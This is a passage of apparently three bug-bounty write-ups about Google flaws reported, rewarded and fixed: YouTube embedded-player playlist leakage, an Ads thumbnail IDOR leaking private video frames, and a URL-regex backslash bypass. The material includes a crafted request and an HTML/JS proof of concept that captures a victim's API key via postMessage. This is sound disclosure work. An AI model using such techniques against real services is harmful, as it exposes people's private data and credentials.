<- {"event":"infoDelivery","info":{"playerState":-1,"currentTime":0,"duration":1344,"videoData":{"video_id":"M7lc1UVf-VE","author":"","title":"YouTube Developers Live: Embedded Web Player Customization"},"videoStartBytes":0,"videoBytesTotal":1,"videoLoadedFraction":0,"playbackQuality":"unknown","availableQualityLevels":[],"currentTimeLastUpdated_":1610191891.79,"playbackRate":1,"mediaReferenceTime":0,"videoUrl":"https://www.youtube.com/watch?v=M7lc1UVf-VE","playlist":null,"playlistIndex":-1},"id":1,"channel":"widget"}
<- {"event":"onStateChange","info":-1,"id":1,"channel":"widget"}

Just a reminder, I was often confused about this, but the “under-the-hood” commands I just showed an example of are sent by your site. By “under-the-hood”, I just mean that developers usually include YouTube’s library, to make communication easier, and that library simply abstracts the details away, so you can just call pauseVideo(), without worrying about anything else. But of course, if you would want, you could manually send these postMessages to the player, via plain old vanilla JavaScript, and it would work in the exact same way as using the fancy JS library. So just think of it as an abstraction layer, which you have full control of.

If you want to see what postMessages a page receives, you could just add an event listener to the page which prints every message to the console:

// listen for all “message” events and log them to the console:
> window.addEventListener("message", function(event){console.log(event.data)})

Okay, so we can play and pause the player with JavaScript. That’s nothing crazy, but it’s cool. Is there anything else we can do? Yes, there is. Actually, if you read the documentation, there is a bunch of stuff we can do using this Player API. Let’s see some of them that might look interesting to us:

The player.getPlaylist() function:

If you want to embed a playlist into your site, you can use the player.loadPlaylist(playlist_id) method of the library to load a playlist into an existing embedded player. After this, you could call playVideo(), and start playing the first video, after which, the next one from the playlist will automatically start playing, and so on. So we have playlist support.

Now, what if you want to embed a playlist into your site, but want to know what videos are in it? There is a function for that as well. Calling player.getPlaylist(), on a player that has a playlist currently loaded, will return an array of the video IDs in the playlist as they are currently ordered:

> player.getPlaylist()

Array(20) [ "KxgcVAuem8g", "U_OirTVxiFE", "rbez_1MEhdQ", "VpC9qeKUJ00",
            "LnDjm9jhkoc", "BQIOEdkivao", "layKyzA1ABc", "-Y9gdQnt7zs",
            "U_OX5vQ567Y", "ghOqpVet1uQ",  ]

Good to know..

The not-really deprecated player.getVideoData() function:

If you look at the raw postMessage communication, often you can see an object named videoData being sent by the iframe to the page. This object contains a bunch of stuff about the currently playing video, including its title.

> player.getVideoData()

Object { video_id: "KxgcVAuem8g", author: "LiveOverflow2",
        title: "Astable 555 timer - Clock Module", video_quality: "medium",
        video_quality_features: [], list: "PLGPckJAmiZCTyI72iI2KaJxkp-vUKBlTi" }

This function is not listed in the official YouTube documentation, supposedly it got removed a few years ago, but as a fellow Stack Overflow member pointed out:

Comment on StackOverflow saying that the function still works in 2017

(Even if the getVideoData() function would be fully removed from the library, as I said before, as long as the iframe sends that object to your page, you could access it.)

Again, interesting, let’s just note that we can do this as well..

One last thing about the embedded player:

If you are logged in to YouTube, the embedded player is also “logged in”. Videos you watch in the player will get added to your Watch History. There is always a little clock icon in the player using which you can add the video to your account’s watch later. So, we could say that if you are logged in to YouTube, the player is also logged in, and it has “full-access” to your account, just like the main YouTube site has.

Chapter 3:
Connecting things together

I really like this bug because of how it didn’t need any fancy “hacking techniques”. Actually, I wasn’t even at a computer when I found this bug, so to say..

You might already put the two things together, and also found the bug, just by reading the first two chapters of this writeup.

At the time, I was looking at YouTube for a while already, testing the playlists separately, and later, testing the embedded player. I wasn’t able to find any bugs. Then, one day, I remember, I was standing on a tram, probably on my way to school, (probably late, as always :( ), and I had this idea:

“Wait a second. Only the owner can see her playlist’s contents. I have the tools to play any playlist in the name of the owner (since the embedded player is also “logged in” to YouTube), and I also have the tools to get the videos from the currently playing playlist. What? Is it this easy?”

Turns out it was that easy. Later, at home, I made a page where I embedded a YouTube player and instructed it to play the playlist HL (the one with your Watch History), and once it loaded, I called player.getPlaylist(), and I think I just printed the result to the console.

I opened the page with my test account and saw the test account’s watch history get printed to the console.

Boom! We have a bug! You visit my page, I steal your Watch History! Not bad.

So we can embed the Watch History playlist. Why not embed other things?

I got to work to make a pretty epic POC, which demonstrated everything an attacker could do using this bug. Here are all of the exploits I was able to pull off using this issue, other than stealing your Watch History:

Stealing your Watch Later:

Similarly to the HL playlist, we could just embed the WL playlist, and steal the contents of the victim’s Watch Later using player.getPlaylist().

Stealing the videos you have liked:

These next exploits will require a targeted attack since the IDs we will be requesting will be based on the victim’s channel ID. Stealing the HL and the WL playlist does not require any victim-specific setup, since everyone has those same IDs.

I have previously explained how to get the playlist ID of the “Liked Videos” playlist. If I knew the victim’s channel ID previously, I could set up a page that loads both of the victim’s possible playlist IDs, and tries to list them using player.getPlaylist(). One of the tries will succeed, and I will have a list of all of the videos the victim has previously liked.

Stealing any private playlist you might have:

Since we are playing these playlists “in the name of the victim”, if the victim has any custom-made private playlists, and we somehow already know it’s ID (this would be pretty hard, so the impact of this is quite low), we could just embed it, and as before, just use getPlaylist() to steal the contents.

Stealing the title & some other info about a private video:

For this, again, we would have to know the ID of the victim’s private video we want to target, which would be pretty hard and would probably require a different bug.

But if we know an ID for a victim’s private video, we could embed that private video to the malicious site, and use player.getVideoData() to steal its title, and some other extra information about it, like the list of available caption languages.

The best for the last, stealing all of your Unlisted videos:

I like this the most since a lot of people use unlisted videos to share personal/not-public videos with only specific people. I’m also doing this, all of the POC videos I send to Google are unlisted videos, and I would consider them pretty sensitive.

So I have previously explained how to get the ID of the “Uploads” playlist for a given channel, and as you might already expect, we could simply embed that playlist into our malicious site.

At the time of finding this bug, embedding the “Uploads” playlist as an owner worked a little bit differently than I expected. Previously I have said that the owner can see all of the videos in this playlist, despite the privacy settings. This is still almost the case, but when an “Uploads” playlist was embedded, the owner only saw the Public and the Unlisted videos in it, the Private videos were omitted. This is perfectly fine for the current attack, but this was a limitation that didn’t allow us to leak all of the Private video IDs, and steal all of the private titles (using the previous attack). Or, stealing all of the private videos altogether, using the bug from my previous writeup.

Anyways, we had the ID of the “Uploads” playlist, we could embed it into our site, and then use the player.getPlaylist() function to list all of video IDs inside.

If a video is Unlisted, the only thing which keeps it secret is its video ID. Now, because we stole all of the unlisted video ID’s, we could watch all of the victim’s unlisted videos!

Here is the POC I have sent to Google. At the time, I, unfortunately, did not make a POC video, and since the issue is now fixed, I made some screenshots to show you how it looked like.

Opening the POC HTML automatically embedded 2 playlists, HL and WL, and displayed the contents as two lists under the players:

Screenshot of the first part of the POC

Scrolling down a bit, you can see the “targeted attacks” section. After entering your channel ID, it listed your “Liked videos” and your “Uploaded videos”, including your unlisted videos. Under that, you could enter a private video ID you had access to, and it displayed the video’s title and listed the available caption languages:

Screenshot of the second part of the POC

Chapter 4:
How it all ends

2019, October 11, 01:15:
My part is done, I go to sleep. But not before refreshing my email one last time, hoping that I might have already got a response. The chances of that are almost zero, but the excitement makes me do this every time I send in a bug.

After two weeks, and a bit of misunderstanding, the bug gets triaged with “At first glance, this might not be severe enough to qualify for a reward”. This hits me quite hard since back then, all of my previous bugs got this same triage message, and after finding this one, I got really excited and was pretty sure to get the mighty “Nice catch! I’ve filed a bug based on your report.” for the first time. But I didn’t. I was tweeting quite frequently at the time, so I let out my frustration a little bit:

My slightly-salty tweet about the email I have got

I was feeling a little down, since I have been hacking on Google VRP for two months already, and all of my bugs got the might not be severe enough message. But most of them were still waiting for the VRP Panel decision about the reward, so not all hope was lost. Yet.

Almost a month later, I get a new email from buganizer-system@google.com. As a Google VRP bug hunter, these are the emails you are looking for. I open it, and I see that this bug got rewarded with a bounty of $1,337. This was my first “leet” reward. I tweeted a gif of a dancing parrot. I like to use that gif for such occasions:

My tweet of a dancing parrot

At the time I also found it a bit weird, but looking back at it, I still think that the impact of this bug was higher than the issued reward. Just thinking about my personal use case, stealing all of the POC videos of potentially unfixed Google bugs from someone (since I am uploading them to YouTube as Unlisted videos) feels pretty high impact for me. Not even talking about the Watch History.

I did not get back to Google about my feelings regarding the impact, so it is possible that if I tell them the reasons why I think it deserves a bigger bounty, they might re-consider the reward decision. If you are in a similar situation, don’t be afraid to ask.

The fix:

16 days after getting the reward email, I get a new email, saying that the issue is fixed. I check out what they did.

When the embedded player loads a playlist, it get’s the contents using the /list_ajax?list=[playlist-id] endpoint. Now, if you give any private/special playlist to this endpoint, it will return an error. Because of this, embedding any of the previously mentioned playlists will just fail, and the player will display an error.

This seemed to be implemented correctly, but one issue was still working, and it was the leaking of the videoData object on a private video, which included the title, and some other information. I ping the bug, saying that this issue still works. For some reason, I do not receive a reply. I ping Google once again, and I get a reply saying that they will let the product team know.

I got back to this bug now, in 2021, and I wanted to re-test the fixes before starting to work on a writeup. Turns out, they also fixed the videoData leak now. If a video is private, you can still embed it, but the videoData that the player sends to your site will just be an empty object.

Conclusion:

What I like about this bug is that proves what I always say when someone asks me how I hunt for bugs, or how they should hunt for bugs. I even said it in my previous writeup:

“In my opinion, the more you understand a system, the more ideas about how to break it will just naturally come to mind.”

Thank you for reading!

Timeline:

[Oct 11, 2019] - Bug reported
[Oct 11, 2019] - Initial triage
[Oct 24, 2019] - Bug accepted (P4 -> P2)
[Nov 14, 2019] - Reward of $1337 issued
[Nov 30, 2019] - First part of the bug mitigated
[??? ??, 2020] - Second part of the bug mitigated, issue is fully fixed

Stealing Your Private YouTube Videos, One Frame at a Time

11 January 2021 at 11:00

Back in December 2019, a few months after I started hacking on Google VRP, I was looking at YouTube. I wanted to find a way to get access to a Private video which I did not own.

When you upload a video to YouTube, you can select between 3 privacy settings. Public, which means that anyone can find and watch your video, Unlisted, which only allows users who know the video ID (the URL) to watch the video, and Private, where only you can watch the video, or other accounts you’ve explicitly given permission to do so.

First thing I did was to upload a video to my second testing account’s YouTube channel, and set the video’s privacy to Private, so I can use that video for testing. (Remember, always only test against resources/accounts you own!) If I can find a way to access that video with my first testing account, we have a bug.

With my first account, I started using YouTube, trying every feature, pressing every button I could find, and whenever I saw an HTTP request with a video ID in it, I changed it to the target Private video, hoping that I can leak some information about it, but I wasn’t really getting any success. The main YouTube site (at least the endpoints I have tested), seems to always check if the video was Private or not, and when trying to request info about the target Private video, they always returned errors such as This video is private!.

I needed to find another way.

A great thing to do in a situation like this, is to try to look for other products/services which are not your main target, but are somehow interacting with its resources internally. If they have access to its resources, it might be possible that they don’t have every level of protection that the main product has.

An interesting target which matched these requirements was Google Ads. This is the product which advertisers use to create ads across all Google services, including YouTube. So, the ads you get before YouTube videos are set up by advertisers here, on the Google Ads platform.

So I created a Google Ads account, and created a new advertisement, which would play a video of mine as a skippable ad for YouTube users. During the ad creation process, I also tried to use the target Private video’s ID wherever I could, but no success.

After creating the ad, I started looking at all of the different Google Ads features. The thing was huge, it had a bunch of different settings/tools. I was trying to find anything that could be YouTube-related.

There was a page called Videos, where I could see a list of videos used by my advertisements. Clicking on a video opened up an Analytics section for that specific video. It had an embedded player, some statistics, and an interesting feature called Moments. It allowed advertisers to “mark” specific moments of the video, to see when different things happen (such as the timestamp of when the company logo appears). To be honest I am not quite sure what advertisers use this feature for, nevertheless, it seemed interesting:

The Moments feature on the Ads console

Looking at the proxy logs, every time I “marked a moment”, a POST request was made to a /GetThumbnails endpoint, with a body which included a video ID:

POST /aw_video/_/rpc/VideoMomentService/GetThumbnails HTTP/1.1
Host: ads.google.com
User-Agent: Internet-Explorer-6
Cookie: [redacted]

__ar={"1":"kCTeqs1F4ME","2":"12240","3":"387719230"}

Where in the __ar parameter, 1 was the ID of the video and 2 was the time of the moment in milliseconds. The response was a base64 encoded image, which was the thumbnail displayed by Ads.

I did what I did a bunch of times already, and replaced the ID to my second account’s Private video in the request, and to my surprise, it returned a base64 response!

I quickly Googled “base64 to image”, and pasted the base64 into the first decoder I found, and it displayed a thumbnail from the target Private video! It worked! I have found a working IDOR (Insecure Direct Object Reference) bug, where I could get a frame from any private video on YouTube!

But I was like “hm, that is just one frame”. We can do better.

I wanted to make a proof of concept Python script which generates an actual, moving “video”. I searched for some calculations, and figured out that if the video is in 24 FPS, one frame stays on the screen for 33 milliseconds. So I just have to download every image starting from 0 milliseconds, incrementing by 33 milliseconds every time, and then construct some kind of video using all of the images I have acquired.

I wrote a quick and dirty POC which downloaded the frames for the first 3 seconds of a video, decoded them, and then generated a GIF. To test it, I have ran it against an old video of mine, which I had previously privated due to, of course, the high level of cringe:

And there you have it, using this bug, any private YouTube video could have been downloaded by a malicious attacker, which to me feels like a pretty cool impact. But of course, it had a few limitations I couldn’t overcome:

  • In the real world you would have to know the ID of the target video. Mass-leaking those would be considered a bug on its own.
  • Since these are just images, you can’t access audio.
  • The resolution is very low. (but it’s high enough to see what is happening)

The takeaway from this bug is that situations where two different products interact with each other under the hood are always a good area to focus on, since both product teams probably only know their own systems best, and might miss important details when working with a different product’s resources.

Looking for an IDOR like this can be a very repetitive and manual task, and nowadays I try to avoid just blindly changing IDs everywhere and hoping for the best. After you test a product for a while and get a feel of how it works internally, it might be more effective (and more fun) to try to think about different unexpected actions that the developers maybe didn’t think about based on what you saw already, or focus on features that just got released, or to just do any other non-mindless task. You will probably enjoy it more in the long term. In my opinion, the more you understand a system, the more ideas about how to break it will just naturally come to mind.

But again, even in the most robust and well tested systems, there is the chance that just swapping an ID in a request will get you a critical bug.

Thank you for reading! See you next Monday ;)

Timeline:

[Dec 11, 2019] - Bug reported
[Dec 12, 2019] - Initial triage
[Dec 20, 2019] - Bug accepted (P4 -> P1)
[Jan 08, 2020] - Bug mitigated by temporarily disabling the Moments feature
[Jan 17, 2020] - Reward of $5000 issued
[??? ??, 2020] - Moments re-enabled, now it checks if you have access to the video

The unexpected Google wide domain check bypass

8 March 2020 at 11:00

Hi! Welcome to my first ever writeup! Let me tell you this “funny” story of me trying to bypass a domain check in a little webapp, and acidentally bypassing a URL parser that is used in (almost) every Google product.

It all started with me sitting at a ‘chill-area’ in 36C3 at December, 2019. I was in the middle of findig a venue for a bug bounty meetup we were trying to organise. After failing horribly, I decided to just sit down and try to hunt for some bugs. I started looking at API documentations, to find some new interesting feature to exploit. I was browsing the GMail API Docs, and came across a button, which generated a GMail API key for you if you pressed it:

The Henhouse App

This looked interesting, since it seemed like you could perform Google Cloud Console action’s, just by making a victim click on a link. I started investigating.

I found out that this app that pops up is called henhouse. The GMmail API Documentation embeds the henhouse app as an IFrame. This is the URL that gets loaded in the iFrame:

https://console.developers.google.com/henhouse/?pb=["hh-0","gmail",null,[],"https://developers.google.com",null,[],null,"Create API key",0,null,[],false,false,null,null,null,null,false,null,false,false,null,null,null,null,null,"Quickstart",true,"Quickstart",null,null,false]

As you can see, the pb[4] in the URL is https://developers.google.com, so the URL of the embedding domain.

The fact you embed henhouse, hints that there is some kind of communication between the parent and the children IFrame. This must be the case, since for example you can click the Done button to close the henhouse window and go back to the documentation. After a bit of testing, I confirmed that the henhouse app sends postMessages to the parent domain (more accurately, to the domain specified in pb[4]). I also found out that if an API key / OAuth Client ID is generated, it is also sent back to the parent in a postMessage.

At this point I had imagined the whole attack scenario. I embed henhouse on my own malicious site, and just listen for the victim’s API key arriving in a postMessage. So I did what I had to do, and put my own domain into the pb object.

The Whitelist Fail

Hmm.. This is not that easy.

To this day not sure why, but I did not give up, and started reverse-engineering the JavaScript to figure out how this “whitelist” works. I think this is something we all often do, that when our attempt fail, we just think that ‘Okey, they of course thought about this. This is protected. Let’s just search for a differnt bug’. Well, for some reason, this time, I did not do this.

So after a few hours of untangling obfuscated JavaScript, I got an understanding of how the whitelist works. I made a pseudocode-version for you:

// This is not real code..

var whitelistedWildcards = ['.corp.google.com', '.c.googlers.com'];
var whitelistedDomains = ['https://devsite.googleplex.com', 'https://developers.google.com',
                          'https://cloud-dot-devsite.googleplex.com', 'https://cloud.google.com'
                          'https://console.cloud.google.com', 'https://console.developers.google.com'];

var domainURL = URL.params.pb[4];
if (whitelistedDomains.includes(domainURL) || getAuthorityFromMagicRegex(domainURL).endsWith(whitelistedWildcards)) {
  postMessage("API KEY: " + apikey, domainURL);
}

Bypassing the whitelistedDomains looked impossible, but for some reason I wanted to dig deeper with the whitelistedWildcards. So it checks if the parsed authority (domain) of the URL ends with .corp.google.com or with .c.googlers.com.

Let’s see how the getAuthorityFromMagicRegex function looks like:

var getAuthorityFromRegex = function(domainURL) {
  var magicRegex = /^(?:([^:/?#.]+):)?(?:\/\/(?:([^/?#]*)@)?([^/#?]*?)(?::([0-9]+))?(?=[/#?]|$))?([^?#]+)?(?:\?([^#]*))?(?:#([\s\S]*))?$/;
  return magicRegex.match(domainURL)[3]
}

Oof.. That is an ugly regex.. What is in the magicRegex.match(domainURL)[3]? Let’s see what this regex returns if we try it on a full-featured url in the JS Console:

"https://user:pass@test.corp.google.com:8080/path/to/something?param=value#hash".match(magicRegex);

Array(8) [ "https://user:pass@test.corp.google.com:8080/path/to/something?param=value#hash",
           "https", "user:pass", "test.corp.google.com", "8080", "/path/to/something", "param=value", "hash" ]

Allright, so magicRegex.match(domainURL)[3] is the authority (domain). Again, I usually would have given up at this point, not sure why I continued. But I wanted to dig deeper and look at this regex.

I put this regex in www.debuggex.com. This is a really cool website, it visualises the regex and you can play with it real time and see how the matching happens.

The Image Generated by Debuggex

I wanted to figure out what makes the regex think that the authority is over, and the port/path is coming. So I wanted to figure out what “ends the authority”.

If we zoom in, we can see that this is the part we are looking for:

Zoomed Image Generated by Debuggex

So, the authority ends with / ? or #, and anything after is not the domain name anymore. All of those are valid, they do “end” the domain. But I had this idea that what if there is something else? We need a character that, when parsed by the browser, does end the authority, but when parsed by this regex, does not. This would allow us to bypass the check, since we could make something that would end in for example .corp.google.com.

Like this:

https://xdavidhu.me[MAGIC_CHARACTER]test.corp.google.com

So, for the browser, the authority is xdavidhu.me, but, for the regex the authority is the whole thing, which ends in .corp.google.com, so the API key postMessage is allowed to be sent.

I started to look at HTTP / URL specifications, all of which are really interesting, and I encourage you to explore these “lower-level” things as well. I didn’t quite find anything there that I wanted, but what I ended up doing and worked was that I wrote a little JavaScript fuzzer to test what ends the authority in an actual browser:

var s = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~';

for (var i = 0; i < s.length; i++) {
  char = s.charAt(i);
  string = 'https://xdavidhu.me'+char+'.corp.google.com';
  try {
    const url = new URL(string);console.log("[+] " + string + " -> " + url.hostname);
  } catch {
    console.log("[!] " + string + " -> ERROR");
  }
}

As you can see, what this script does is that it loops through the string s, puts all characters one-by-one in the middle of the URL, parses the URL and prints the authority.

Besides many “negative” results, it produced 4 “positive” results. It found 4 characters that ended the authority:

[+] https://xdavidhu.me/.corp.google.com -> xdavidhu.me
[+] https://xdavidhu.me?.corp.google.com -> xdavidhu.me
[+] https://xdavidhu.me#.corp.google.com -> xdavidhu.me
[+] https://xdavidhu.me\.corp.google.com -> xdavidhu.me

This is just what we needed!

In the browser, besides /, ? and #, \ also ends the authority!

I tested it the 3 major browsers I had on hand (Firefox, Chrome, Safari) and all of them had the same result.

After this, I found the source of this behaviour in Chromium’s source code:

bool IsAuthorityTerminator(base::char16 ch) {
  return IsURLSlash(ch) || ch == '?' || ch == '#';
}

And the IsURLSlash function:

inline bool IsURLSlash(base::char16 ch) {
  return ch == '/' || ch == '\\';
}

Again, I was always “afraid” to dig this deep, and would never have thought about looking into the source code of a browser, but after browsing around a bit, you realise that this code is also just code, and you can understand how it works. This is super and interesting and can be really helpful in many situations. I could have just looked into the source code to find this bug, skipping the whole fuzzer part.

Using this bug, we can demo the exploit in the JS Console:

// Regex parsing
"https://user:pass@xdavidhu.me\\test.corp.google.com:8080/path/to/something?param=value#hash".match(magicRegex)

Array(8) [ "https://user:pass@xdavidhu.me\\test.corp.google.com:8080/path/to/something?param=value#hash",
           "https", "user:pass", "xdavidhu.me\\test.corp.google.com", "8080", "/path/to/something", "param=value", "hash" ]

// Browser parsing
new URL("https://user:pass@xdavidhu.me\\test.corp.google.com:8080/path/to/something?param=value#hash")

URL { href: "https://user:pass@xdavidhu.me/test.corp.google.com:8080/path/to/something?param=value#hash",
      origin: "https://xdavidhu.me", protocol: "https:", username: "user", password: "pass", host: "xdavidhu.me",
      hostname: "xdavidhu.me", port: "", pathname: "/test.corp.google.com:8080/path/to/something", search: "?param=value" }

We can see that this works as we wanted it to, so we can make a POC, which will embed henhouse, and grab the victim’s API key.

<iframe id="test" src='https://console.developers.google.com/henhouse/?pb=["hh-0","gmail",null,[],"https://xdavidhu.me\\test.corp.google.com",null,[],null,"Create API key",0,null,[],false,false,null,null,null,null,false,null,false,false,null,null,null,null,null,"Quickstart",true,"Quickstart",null,null,false]'></iframe>

<script>
window.addEventListener('message', function (d) {
  console.log(d.data);
  if(d.data[1] == "apikey-credential"){
    var h1 = document.createElement('h1');
    h1.innerHTML = "Your API key: " + d.data[2];
    document.body.appendChild(h1);
  }
});
</script>

Here is the POC video I sent to Google which shows this in action:

At this point, I had mixed feeling about this, since this had quite a low impact. You could only “steal” API keys or OAuth Client ID’s. Cliend ID’s without the secrets are meh, and if you wanted to generate an API key for an API that was paid (with required billing), it required user interaction. So essentially this was a pretty low/medium impact bug.

Then I had this thought that this regex looks way too overkill to be created exclusively for henhouse.

I started grepping JS files in other Google products, and yep, this regex was everywhere. I found this regex in the Google Cloud Console’s JS, Google Actions Console’s JS, in YouTube Studio, in myaccount.google.com (!) and even in some Google Android Apps.

A day later I even found this line in the Google Corp Login Page (login.corp.google.com):

var goog$uri$utils$splitRe_ = [THE_MAGIC_REGEX],

After this, I was sure this is something bigger then just the henhouse. Anywhere this regex is used to do domain validation with the similar “ends-with” logic, it can be bypassed with the \ character.

Two days after reporting, I got this response:

The Triage Message

Few weeks later, I was watching LiveOverFlow’s ‘XSS on Google Search’ video, where he mentioned that “But Google’s JavaScript code is actually Open Source!”. And then he showed “Google’s common JavaScript library”, the Closure libary.

I immediately was like: “Wait a minute, did I found a bug in this library?”

I quickly opened the Closure libary GitHub repo, and looked at the commits. And this is what I found:

The Commit in the Closure Library

With this change:

The Content of the Commit

That is mee! :D

So this was the story if me trying to bypass a small app’s URL validation and accidentally finding a bug in Google’s common JavaScript library! I hope you enjoyed!

You can follow me on Twitter: @xdavidhu

Timeline:

[Jan 04, 2020] - Bug reported
[Jan 06, 2020] - Initial triage
[Jan 06, 2020] - Bug accepted (P4 -> P1)
[Jan 17, 2020] - Reward of $6000 issued
[Mar 06, 2020] - Bug fixed

❌
❌